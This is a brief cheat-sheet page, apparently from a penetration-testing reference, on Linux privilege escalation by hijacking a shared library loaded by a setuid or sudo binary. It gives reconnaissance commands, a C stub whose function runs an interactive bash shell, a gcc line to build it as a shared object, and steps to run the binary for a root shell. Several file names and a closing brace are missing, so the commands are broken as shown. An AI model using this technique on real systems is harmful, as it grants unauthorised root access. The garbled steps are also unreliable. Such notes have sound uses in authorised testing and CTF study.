Shared Library Hijacking

Last modified: 2023-09-13

Linux Privilege Escalation


When we find the binary file as setuid or sudo command, check the strings of the binary file.

strings ./example
strace ./example
gdb ./example


If the binary file uses a shared library (e.g. and this library can be modified, we can update it and get a root shell.

find / -type f -name "" 2>/dev/null
ls -al /path/to/

drwxrwxrwx 1 user user 64 Dec 15 09:13


Create "foo.c".

#include <stdlib.h>
#include <unistd.h>

void foo() {
    system("/bin/bash -i");

Then compile it to shared object.

gcc -shared -fPIC -nostartfiles -o foo.c

Put the shared file to /path/to/ .
Now run the binary.

# or
sudo ./example

We should get a root shell.